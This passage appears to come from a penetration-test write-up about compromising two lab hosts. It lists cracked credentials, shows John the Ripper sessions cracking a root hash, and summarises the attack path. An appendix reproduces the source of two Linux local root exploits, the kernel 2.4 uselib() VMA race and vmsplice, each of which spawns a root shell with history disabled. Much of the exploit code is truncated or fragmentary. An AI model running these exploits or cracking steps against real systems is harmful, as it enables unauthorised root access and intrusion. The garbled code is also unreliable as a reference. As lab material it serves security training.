Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtablock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh,
/usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth,
/bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs,
/sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs,
/sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage,
/usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/sshkeysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin
With this new approach in mind, additional john sessions were created
to use the googled password.txt file and the newly generated aspell
dumped file. The results were far more impressive than anticipated.
Within 2 seconds, the password for the root account had been cracked.
bt cptvm1 # john --session=cptvm1-3 --users=root -wordlist=../passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
cavalry
(root)
guesses: 1 time: 0:00:00:02 100% c/s: 5511 trying: cavalry
At this point, the john session that had been started to use the
googled password.txt file as a wordlist was aborted.
bt cptvm1 # john --session=cptvm1-2 --users=root -wordlist=../passwords/passwords.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0 time: 0:00:00:22 100% c/s: 5502 trying: !
In addition, the initial john session was also aborted. I want those 11
hours of my life back, certification crew! :)
bt cptvm1 # john --session=cptvm1 --users=root shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0 time: 0:10:53:47 (3) c/s: 5722 trying: 35885297
Session aborted
L. Ultimate goal
i. Cptvm1 and cptvm2 hosts compromised
The initial access to the cptvm1 host was obtained by brute force
password guessing of the user account. After gaining basic access to
the cptvm1 host, the cptvm1 and cptvm2 user accounts were brute
force password attacked. This provided basic access to the cptvm2
host. The cptvm1 host was then compromised via a VMA exploit.
Next, the cptvm2 host was compromised via a vmsplice exploit.
Finally, the root passwords were cracked.
ii. Passwords for root accounts on cptvm1 and cptvm2
The password for root@cptvm1 is cavalry
The password for root@cptvm2 is admin
M. Lessons learned
i. Searching exploit sites
The quality of the exploits and exploit information varies radically
between sites. For example, the milw0rm.com site has good quality
code but limited information on the background of the exploit. In
contrast, the www.securityfocus.com site has more extensive
information about an exploit but may only state "Exploit code has been
published" instead of providing the actual exploit code.
With such a wide footprint for searches in mind, a site like
secwatch.org should be the preferred solution. However, it was found
that certain searches don't perform well via secwatch.org.
5. Appendix
A. Source code for the Kernel 2.4 VMA exploit
/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu <timhsu at chroot.org> Jan 2005.
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <syscall.h>
#include <limits.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <sys/sysinfo.h>
#include <linux/elf.h>
#include <linux/linkage.h>
#include <asm/page.h>
#include <asm/ldt.h>
#include <asm/segment.h>
#define str(s) #s
#define xstr(s) str(s)
#define MREMAP_MAYMOVE
// temp lib location
#define LIBNAME "/tmp/_elf_lib"
// shell name
#define SHELL "/bin/bash"
// time delta to detect race
#define RACEDELTA 5000
// if you have more deadbabes in memory, change this
#define MAGIC 0xdeadbabe
// do not touch
#define SLAB_THRSH 128
#define SLAB_PER_CHLD (INT_MAX - 1)
#define LIB_SIZE ( PAGE_SIZE * 4 )
#define STACK_SIZE ( PAGE_SIZE * 4 )
#define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )
#define ENTRY_LCS ( ENTRY_GATE-2 )
#define SEL_LCS ( (ENTRY_LCS<<3)|0x04 )
#define ENTRY_LDS ( ENTRY_GATE-1 )
#define SEL_LDS ( (ENTRY_LDS<<3)|0x04 )
#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB
#define TMPLEN 256
#define PGD_SIZE ( PAGE_SIZE*1024 )
delta = 0,
delta_max = RACEDELTA,
map_flags = PROT_WRITE|PROT_READ;
static int
fstop=0,
silent=0,
pidx,
pnum=0,
smp_max=0,
smp,
wtime=2,
cpid,
uid,
task_size,
old_esp,
lib_addr,
map_count=0,
map_base=0,
map_addr,
addr_min,
addr_max,
vma_start,
vma_end,
max_page;
static struct timeval tm1, tm2;
static char *myenv[] = {"TERM=vt100",
"HISTFILE=/dev/null",
NULL};
static char hellc0de[] =
"\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70"
"\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00";
static char *pagemap, *libname=LIBNAME, *shellname=SHELL;
#define __NR_sys_gettimeofday __NR_gettimeofday
#define __NR_sys_sched_yield __NR_sched_yield
#define __NR_sys_madvise __NR_madvise
#define __NR_sys_uselib __NR_uselib
#define __NR_sys_mmap2 __NR_mmap2
#define __NR_sys_munmap __NR_munmap
#define __NR_sys_mprotect __NR_mprotect
#define __NR_sys_mremap __NR_mremap
sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if(!smp_max && delta < (unsigned)delta_max) goto recheck;
smp = smp_max;
// check if lib VMAs exist as expected under race condition
recheck2:
val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);
if(val) continue;
errno = 0;
val = sys_madvise((void*) (lib_addr+PAGE_SIZE),
LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
if( !val || (val<0 && errno!=ENOMEM) ) continue;
// SMP?
smp--;
if(smp>=0) goto recheck2;
// recheck race
if(!go) continue;
finish++;
//
return 0;
}
int callme_1()
{
return val++;
}
inline int valid_ptr(unsigned ptr)
{
return ptr>=task_size && ptr<addr_min-16;
}
inline int validate_vma(unsigned *p, unsigned s, unsigned e)
{
unsigned *t;
if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) {
t=(unsigned*)p[3];
if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size )
return 1;
}
return 0;
}
asmlinkage void kernel_code(unsigned *task)
{
unsigned *addr = task;
//
//
}
void kcode(void);
// CPL0 code mostly stolen from cliph
void __kcode(void)
{
asm(
"kcode:                            \n"
"    pusha                         \n"
"    pushl %es                     \n"
"    pushl %ds                     \n"
"    movl $(" xstr(SEL_LDS) ") ,%edx \n"
"    movl %edx,%es                 \n"
"    movl %edx,%ds                 \n"
"    movl $0xffffe000,%eax         \n"
"    andl %esp,%eax                \n"
"    pushl %eax                    \n"
"    call kernel_code              \n"
"    addl $4, %esp                 \n"
"    popl %ds                      \n"
"    popl %es                      \n"
"    popa                          \n"
"    lret                          \n"
);
}
int callme_2()
{
return val + task_size + addr_min;
}
void sigfailed(int v)
{
ccnt++;
fatal("lcall", 1);
}
// modify LDT & exec
void try_to_exploit(unsigned addr)
{
volatile int r, *v;
printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout);
unlink(libname);
r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);
if(r) fatal("mprotect 1", 1);
//
// setup CPL0 segment descriptors (we need the 'accessed' versions ;-)
v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) );
v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */
v[1] = 0x00cf9b00;
v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) );
v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */
v[1] = 0x00cf9300;
//
// CPL0 transition
sys_sched_yield();
val = callme_1() + callme_2();
asm("lcall $" xstr(SEL_GATE) ",$0x0");
//if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) {
if (getuid()==0) {
printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout);
} else {
printf("\n[-] uid change failed" ); fflush(stdout);
sigfailed(0);
}
signal(SIGTERM, SIG_IGN);
kill(0, SIGTERM);
setresuid(0, 0, 0);
execl(shellname, "sh", NULL);
fatal("execl", 0);
}
void scan_mm_finish();
void scan_mm_start();
// kernel page table scan code
void scan_mm()
{
map_addr -= PAGE_SIZE;
if(map_addr <= (unsigned)addr_min)
scan_mm_start();
scnt=0;
val = *(int*)map_addr;
scan_mm_finish();
}
void scan_mm_finish()
{
retry:
__asm__("movl %0, %%esp" : :"m"(old_esp) );
if(scnt) {
pagemap[pidx] ^= 1;
}
else {
sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED);
}
pidx--;
scan_mm();
goto retry;
}
// make kernel page maps before and after allocating LDT
void scan_mm_start()
{
static int npg=0;
static struct modify_ldt_ldt_s l;
//static struct user_desc l;
pnum++;
if(pnum==1) {
pidx = max_page-1;
}
else if(pnum==2) {
memset(&l, 0, sizeof(l));
l.entry_number = LDT_ENTRIES-1;
l.seg_32bit = 1;
l.base_addr = MAGIC >> 16;
l.limit = MAGIC & 0xffff;
l.limit_in_pages = 1;
if( modify_ldt(1, &l, sizeof(l)) != 0 )
fatal("modify_ldt", 1);
pidx = max_page-1;
}
else if(pnum==3) {
npg=0;
for(pidx=0; pidx<=max_page-1; pidx++) {
if(pagemap[pidx]) {
npg++;
}
else if(npg == LDT_PAGES) {
npg=0;
try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);
} else {
npg=0;
}
}
fatal("find LDT", 1);
}
//
// return number of available SLAB objects in cache
int get_slab_objs(const char *sn)
{
static int c, d, u = 0, a = 0;
FILE *fp=NULL;
char x1[20];
fp = fopen("/proc/slabinfo", "r");
if(!fp)
fatal("get_slab_objs: fopen", 0);
fgets(name, sizeof(name) - 1, fp);
do {
c = u = a = -1;
if (!fgets(line, sizeof(line) - 1, fp))
break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a,
&d, &d, &d, &d);
} while (strcmp(name, sn));
close(fileno(fp));
fclose(fp);
return c == 7 ? a - u : -1;
}
long memmaped_size = 0;
// leave one object in the SLAB
inline void prepare_slab()
{
int *r;
map_addr -= PAGE_SIZE;
map_count++;
map_flags ^= PROT_READ;
r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED == r) {
printf("--> prepare_slab(), %dMb\n", memmaped_size/1024/1024);
fatal("try again", 0);
}
memmaped_size += PAGE_SIZE;
*r = map_addr;
}
// sig handlers
void segvcnt(int v)
{
scnt++;
scan_mm_finish();
}
// child reap
void reaper(int v)
{
ccnt++;
waitpid(0, &v, WNOHANG|WUNTRACED);
}
// sometimes I get the VMAs in reversed order...
// so just use anyone of the two but take care about the flags
void check_vma_flags();
void vreversed(int v)
{
map_flags = 0;
check_vma_flags();
}
void check_vma_flags()
{
if(map_flags) {
__asm__("movl %%esp, %0" : :"m"(old_esp) );
} else {
__asm__("movl %0, %%esp" : :"m"(old_esp) );
goto out;
}
signal(SIGSEGV, vreversed);
val = * (unsigned*)(lib_addr + PAGE_SIZE);
out:
}
// use elf library and try to sleep on kmalloc
void exploitme()
{
int r, sz, pcnt=0;
static char smiley[]="-\\|/-\\|/";
//
printf("\n    cat /proc/%d/maps", getpid() ); fflush(stdout);
// helper clone
finish=0; ccnt=0;
sz = sizeof(cstack) / sizeof(cstack[0]);
cpid = clone(&raceme, (void*) &cstack[sz-16],
CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL );
if(-1==cpid) fatal("clone", 0);
// synchronize threads
while(!finish) sys_sched_yield();
finish=0;
if(!silent) {
printf("\n"); fflush(stdout);
}
//
//
// relax kswapd
sys_gettimeofday(&tm1, NULL);
for(;;) {
sys_sched_yield();
sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if( wtime*1000000U <= (unsigned)delta ) break;
}
//
//
//
failed:
printf("failed:\n");
fatal("try again", 0);
}
// make fake ELF library
void make_lib()
{
struct elfhdr eh;
struct elf_phdr eph;
static char tmpbuf[PAGE_SIZE];
int fd;
//
//
// section header:
memset(&eph, 0, sizeof(eph) );
eph.p_type = PT_LOAD;
eph.p_offset = 4096;
eph.p_filesz = 4096;
eph.p_vaddr = lib_addr;
eph.p_memsz = LIB_SIZE;
eph.p_flags = PF_W|PF_R|PF_X;
write(fd, &eph, sizeof(eph) );
// execable code
lseek(fd, 4096, SEEK_SET);
memset(tmpbuf, 0x90, sizeof(tmpbuf) );
write(fd, &tmpbuf, sizeof(tmpbuf) );
close(fd);
}
// move stack down #2
void prepare_finish()
{
int r;
static struct sysinfo si;
old_esp &= ~(PAGE_SIZE-1);
old_esp -= PAGE_SIZE;
task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB;
r = sys_munmap(old_esp, task_size-old_esp);
if(r) fatal("unmap stack", 0);
// setup rt env
uid = getuid();
lib_addr = task_size - LIB_SIZE - PAGE_SIZE;
if(map_base)
map_addr = map_base;
else
map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1);
printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x",
// go go
make_lib();
exploitme();
}
// move stack down #1
void prepare()
{
unsigned p=0;
environ = myenv;
p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 );
if(-1==p) fatal("mmap2 stack", 0);
p += STACK_SIZE - 64;
__asm__("movl %%esp, %0 \n"
"movl %1, %%esp \n"
: : "m"(old_esp), "m"(p)
);
prepare_finish();
}
void chldcnt(int v)
{
ccnt++;
}
// alloc slab objects...
inline void do_wipe()
{
int *r, c=0, left=0;
__asm__("movl %%esp, %0" : : "m"(old_esp) );
old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1);
old_esp = map_base? map_base : old_esp;
for(;;) {
if(left<=0)
left = get_slab_objs("vm_area_struct");
if(left <= SLAB_THRSH)
break;
left--;
map_flags ^= PROT_READ;
old_esp -= PAGE_SIZE;
r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 );
if(MAP_FAILED == r)
break;
if(c>SLAB_PER_CHLD)
break;
if( (c%1024)==0 ) {
if(!c) printf("\n");
printf("\r    child %d VMAs %d", val, c);
fflush(stdout);
}
c++;
}
printf("\r    child %d VMAs %d", val, c);
fflush(stdout);
kill(getppid(), SIGUSR1);
for(;;) pause();
}
// empty SLAB caches
void wipe_slab()
{
signal(SIGUSR1, chldcnt);
printf("\n[+] SLAB cleanup"); fflush(stdout);
for(;;) {
ccnt=0;
val++;
cpid = fork();
if(!cpid)
do_wipe();
while(!ccnt) sys_sched_yield();
if( get_slab_objs("vm_area_struct") <= SLAB_THRSH )
break;
}
signal(SIGUSR1, SIG_DFL);
}
void usage(char *n)
{
printf("\nUsage: %s\t-f forced stop\n", n);
printf("\t\t-s silent mode\n");
printf("\t\t-c command to run\n");
printf("\t\t-n SMP iterations\n");
printf("\t\t-d race delta us\n");
printf("\t\t-w wait time seconds\n");
printf("\t\t-l alternate lib name\n");
printf("\t\t-a alternate addr hex\n");
printf("\n");
_exit(1);
}
// give -s for forced stop, -b to clean SLAB
int main(int ac, char **av)
{
int r;
while(ac) {
r = getopt(ac, av, "n:l:a:w:c:d:fsh");
if(r<0) break;
switch(r) {
case 'f' :
fstop = 1;
break;
case 's' :
silent = 1;
break;
case 'n' :
smp_max = atoi(optarg);
break;
case 'd':
if(1!=sscanf(optarg, "%u", &delta_max) || delta_max >
100000u )
fatal("bad delta value", 0);
break;
case 'w' :
wtime = atoi(optarg);
if(wtime<0) fatal("bad wait value", 0);
break;
case 'l' :
libname = strdup(optarg);
break;
case 'c' :
shellname = strdup(optarg);
break;
case 'a' :
if(1!=sscanf(optarg, "%x", &map_base))
fatal("bad addr value", 0);
map_base &= ~(PGD_SIZE-1);
break;
case 'h' :
default:
usage(av[0]);
break;
}
}
consume_pid = fork();
//
if (consume_pid == 0)
{
consume_memory();
pause();
return 0;
}
// basic setup
uid = getuid();
setpgrp();
wipe_slab();
prepare();
return 0;
}
// milw0rm.com [2005-01-27]
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void
{
316
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void *get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void *get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl)
#endif
kernel_code()
int i;
uint *p = get_current();
exit_code()
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
int
{
int pi[2];
size_t map_size;
char *map_addr;
struct iovec iov;
struct page *pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");
if (!uid || !gid)
die("!@#$", 0);
/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
pages[0]->flags    = 1 << PG_compound;
pages[0]->private  = (unsigned long) pages[0];
pages[0]->count    = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags    = 1 << PG_compound;
pages[2]->private  = (unsigned long) pages[2];
pages[2]->count    = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
// milw0rm.com [2008-02-09]